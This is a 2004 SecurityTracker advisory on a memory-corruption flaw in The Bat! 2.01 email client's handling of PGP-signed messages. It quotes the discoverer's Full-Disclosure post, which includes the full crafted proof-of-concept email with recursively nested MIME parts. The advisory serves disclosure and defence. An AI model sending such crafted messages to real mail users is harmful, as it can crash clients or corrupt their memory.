SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   The Bat! Vendors:   RIT Research Labs
The Bat! PGP Message Recursion Flaw May Permit Remote Code Execution
SecurityTracker Alert ID:  1008740
SecurityTracker URL:  http://securitytracker.com/id/1008740
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2004
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 2.01
Description:   A vulnerability was reported in The Bat! in the processing of PGP-signed messages. A remote user may be able to execute arbitrary code.

It is reported that a remote user can send a specially crafted PGP-signed e-mail message with multiple recursively included MIME parts to trigger the flaw and cause a handled exception on the target system. The report said that by changing the layout of the MIME parts and signatures, a malicious e-mail can cause The Bat! to read from and write to various unallocated memory locations, suggesting that arbitrary code execution may be possible.

The vendor was reportedly unable to reproduce the flaw in version 2.03 Beta.

According to the report, the version 1.x series is not vulnerable.

A demonstration exploit message is provided in the Source Message.

AGK (agk at sandy.ru) is credited with discovering this flaw.

Impact:   A remote user may be able to cause The Bat! to execute arbitrary code. [Editor's note: Arbitrary code execution was not confirmed in the report.]
Solution:   The vendor was reportedly unable to reproduce the flaw in version 2.03 Beta.
Vendor URL:  www.ritlabs.com/en/products/thebat/ (Links to External Site)
Cause:   Boundary error, State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] The Bat! 2.01 memory corruption


------------12A10520C36A20510
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dear bugtraq,

AGK (agk at sandy.ru) discovered The Bat! 2.01 to throw exception on few
messages.  It  looks  like The Bat! 2.01 in standard configuration (with
build-in  PGP  support)  has  a  bug with processing PGP signed messages
(protocol="application/pgp-signature")    with    multiple   recursively
included  parts. I did not any debugging and problem may be in something
else, but changing layout of parts and signatures makes The Bat! to read
_and  write_ different unallocated memory regions, potentially it may be
exploitable  to  code execution. Because The Bat! has it's own exception
handler, application does not crash.

Vendor  (RitLabs)  was  contacted and replied he was unable to reproduce
this  bug  in  2.03  Beta  and  latest release 2.02 CE is _probably_ not
vulnerable   to.  I  did  not  any  validation.  1.x  versions  are  not
vulnerable.

Example of message attached.

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/
------------12A10520C36A20510
Content-Type: message/rfc822; name="batcrash.msg"
Content-Disposition: attachment; filename="batcrash.msg"

From: "Test"
To: "Test"
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-VOhSalJVh0ipN8GZDCj3"
Organization: 
Mime-Version: 1.0
Date: 31 Dec 2003 23:42:47 +0300


--=-VOhSalJVh0ipN8GZDCj3
Content-Type: multipart/mixed; boundary="=-HuumM/Y9Qpvq2SoxnAYs"


--=-HuumM/Y9Qpvq2SoxnAYs
Content-Type: multipart/alternative; boundary="=-rxC2ED57bE++pIpgCxGK"


--=-rxC2ED57bE++pIpgCxGK
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hello administrator.

--=20
Test

--=-rxC2ED57bE++pIpgCxGK
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

-- <BR>
Test

--=-rxC2ED57bE++pIpgCxGK--

--=-HuumM/Y9Qpvq2SoxnAYs
Content-Disposition: inline
Content-Type: message/rfc822

Date: Sat, 27 Dec 2003 10:18:57 +0300 (MSK)
From: Test
Subject: Test2
To: Test
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="38853510C39.1072549137/test"
Message-Id: <20031227181857.E5FA4510D0D@test>


--38853510C39.1072549137/test
Content-Description: Notification
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Test

--38853510C39.1072549137/test
Content-Description: Delivery error report
Content-Type: message/delivery-status
Content-Transfer-Encoding: quoted-printable

Reporting-MTA: dns; test
Arrival-Date: Sat, 27 Dec 2003 10:18:53 -0800 (PST)

Test

--38853510C39.1072549137/test--

--=-HuumM/Y9Qpvq2SoxnAYs
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: Test

iD8DBQA/88Fngiv4lW690g8RAvSKAKCG8RPRPwYvvROWkJiXg9mJDT0NGgCgnhZ8
odAA1J0h/6h0OyiyY7PEt9Y=
=e5k6
-----END PGP SIGNATURE-----

--=-HuumM/Y9Qpvq2SoxnAYs--



--=-VOhSalJVh0ipN8GZDCj3--

------------12A10520C36A20510--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC